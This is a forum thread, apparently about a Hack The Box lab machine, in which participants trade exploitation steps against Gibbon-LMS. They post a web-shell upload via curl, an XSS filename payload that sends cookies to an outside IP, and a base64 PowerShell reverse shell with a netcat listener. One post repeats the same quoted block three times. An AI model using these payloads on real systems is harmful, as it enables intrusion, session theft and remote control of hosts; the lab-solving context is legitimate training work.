Posts: 22
Threads: 0
Joined: Mar 2025
Mar 21, 2025, 03:11 PM
(This post was last modified: Mar 21, 2025, 03:13 PM by cYpHeRtho.)
debug1: Unspecified GSS failure. Minor code may provide more information
Server not found in Kerberos database
even tried the command ssh -o GSSAPIAuthentication=yes -o GSSAPITrustDNS=no f.frizzle@frizz.htb -vvv
Posts: 1
Threads: 0
Joined: Feb 2025
(Mar 16, 2025, 06:36 PM)TechArtificer Wrote: It may also help to have /etc/hosts like this:
10.10.11.60 frizzdc.frizz.htb frizz.htb
So having the DC name as first entry.
This resolved some rDNS issues for me.
This is a lifesaver, when nothing else worked, this did.
Posts: 2
Threads: 0
Joined: Mar 2025
I never thought about adding the Schoolbus account to the Administrator group. Thanks
Posts: 3
Threads: 0
Joined: Jan 2025
Still stuck on the reverse shell. Shell works great tho
Posts: 1
Threads: 0
Joined: Mar 2025
(Mar 15, 2025, 11:59 PM)AbsolutelyMadProc Wrote: There's a 7z file in Recycle Bin that contains the password for M.Schoolbus. The user has WriteGPLInk perms over Class_FRIZZ and DOMAIN CONTROLLERS. Haven't looked into exploitation yet
where did you find the pwd for M.SchoolBus? It contains a lot of files and a string search returned nothing...
Posts: 2
Threads: 0
Joined: Mar 2025
(Mar 15, 2025, 09:36 PM)kyakeiuwu Wrote: (Mar 15, 2025, 09:32 PM)eyalzaba Wrote: (Mar 15, 2025, 09:16 PM)kyakeiuwu Wrote: (Mar 15, 2025, 09:07 PM)VoidNull Wrote: (Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y"
uploaded the file but nothing happening.
(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote: how did you manage to get shell
Upload a web shell
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.
Then go to
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]
Remember to listen to the port you declared on revshells.com.
nv -lvnp XXX
Im running around trying to find a user flag 
nope doesnt work for me
try to use urlencode... 
nvm that was dumb for me lol it worked
I am trying to use the same method but nc keep listen and no shell.
What am I doing wrong.
I generate this base64 code and URL encoded and pasted in the domain. For some reason it does not give me a shell. Any help is appreciated.
Ip 10.10.15.16L:4444
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMQA2ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA%3D%3D
[/quote/
Posts: 2
Threads: 0
Joined: Mar 2025
Mar 23, 2025, 01:01 AM
(This post was last modified: Mar 23, 2025, 01:02 AM by alahi69.)
(Mar 15, 2025, 09:36 PM)kyakeiuwu Wrote: (Mar 15, 2025, 09:32 PM)eyalzaba Wrote: (Mar 15, 2025, 09:16 PM)kyakeiuwu Wrote: (Mar 15, 2025, 09:07 PM)VoidNull Wrote: (Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y"
uploaded the file but nothing happening.
(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote: how did you manage to get shell
Upload a web shell
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.
Then go to
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]
Remember to listen to the port you declared on revshells.com.
nv -lvnp XXX
Im running around trying to find a user flag 
nope doesnt work for me
try to use urlencode... 
nvm that was dumb for me lol it worked
I am trying to use the same method but nc keep listen and no shell.
What am I doing wrong.
I generate this base64 code and URL encoded and pasted in the domain. For some reason it does not give me a shell. Any help is appreciated.
Ip 10.10.15.16L:4444
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMQA2ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA%3D%3D
[/quote/
(Mar 15, 2025, 09:36 PM)kyakeiuwu Wrote: (Mar 15, 2025, 09:32 PM)eyalzaba Wrote: (Mar 15, 2025, 09:16 PM)kyakeiuwu Wrote: (Mar 15, 2025, 09:07 PM)VoidNull Wrote: (Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y"
uploaded the file but nothing happening.
(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote: how did you manage to get shell
Upload a web shell
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.
Then go to
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]
Remember to listen to the port you declared on revshells.com.
nv -lvnp XXX
Im running around trying to find a user flag 
nope doesnt work for me
try to use urlencode... 
nvm that was dumb for me lol it worked
I am trying to use the same method but nc keep listen and no shell.
What am I doing wrong.
I generate this base64 code and URL encoded and pasted in the domain. For some reason it does not give me a shell. Any help is appreciated.
Ip 10.10.15.16L:4444
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMQA2ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA%3D%3D
[/quote/
(Mar 15, 2025, 09:36 PM)kyakeiuwu Wrote: (Mar 15, 2025, 09:32 PM)eyalzaba Wrote: (Mar 15, 2025, 09:16 PM)kyakeiuwu Wrote: (Mar 15, 2025, 09:07 PM)VoidNull Wrote: (Mar 15, 2025, 08:42 PM)Adith19051905 Wrote: curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Planner/resources_addQuick_ajaxProcess.php" \
-F "id=body" \
-F "bodyfile1=@file.jpg;filename=<img src=x onerror=new Image().src='http://10.10.16.16:9001?cookie='+document.cookie>.jpg" \
-F "imagesAsLinks=Y"
uploaded the file but nothing happening.
(Mar 15, 2025, 09:04 PM)Adith19051905 Wrote: how did you manage to get shell
Upload a web shell
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
Then generate a reverse shell with your IP and PORT on revshells.com using the PowerShell #3 (base64) option.
Then go to
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=[Insert base64 encoded reverse shell]
Remember to listen to the port you declared on revshells.com.
nv -lvnp XXX
Im running around trying to find a user flag 
nope doesnt work for me
try to use urlencode... 
nvm that was dumb for me lol it worked
I am trying to use the same method but nc keep listen and no shell.
What am I doing wrong.
I generate this base64 code and URL encoded and pasted in the domain. For some reason it does not give me a shell. Any help is appreciated.
Ip 10.10.15.16L:4444
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMQA2ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA%3D%3D
[/quote/
Posts: 1
Threads: 0
Joined: Mar 2024
Mar 23, 2025, 12:45 PM
(This post was last modified: Mar 23, 2025, 12:56 PM by Udodelige.)
(Mar 22, 2025, 01:09 PM)fizzle Wrote: (Mar 15, 2025, 11:59 PM)AbsolutelyMadProc Wrote: There's a 7z file in Recycle Bin that contains the password for M.Schoolbus. The user has WriteGPLInk perms over Class_FRIZZ and DOMAIN CONTROLLERS. Haven't looked into exploitation yet
where did you find the pwd for M.SchoolBus? It contains a lot of files and a string search returned nothing...
I would also like a hint on how M.Schoolbus password was found, any help appreciated
(Mar 23, 2025, 12:45 PM)Udodelige Wrote: (Mar 22, 2025, 01:09 PM)fizzle Wrote: (Mar 15, 2025, 11:59 PM)AbsolutelyMadProc Wrote: There's a 7z file in Recycle Bin that contains the password for M.Schoolbus. The user has WriteGPLInk perms over Class_FRIZZ and DOMAIN CONTROLLERS. Haven't looked into exploitation yet
where did you find the pwd for M.SchoolBus? It contains a lot of files and a string search returned nothing...
I would also like a hint on how M.Schoolbus password was found, any help appreciated
Ok nevermind just tilted that the password in the config folder was Base64 encoded
Posts: 15
Threads: 2
Joined: Jan 2025
(Mar 21, 2025, 03:11 PM)cYpHeRtho Wrote: debug1: Unspecified GSS failure. Minor code may provide more information
Server not found in Kerberos database
even tried the command ssh -o GSSAPIAuthentication=yes -o GSSAPITrustDNS=no f.frizzle@frizz.htb -vvv
just add -K, so it will be like this: ssh f.frizzle@10.10.11.60 -K
Posts: 3
Threads: 0
Joined: Jan 2025
If anyone is getting a "ERRORS:
Unexpected end of archive"
add -O to the scp command
|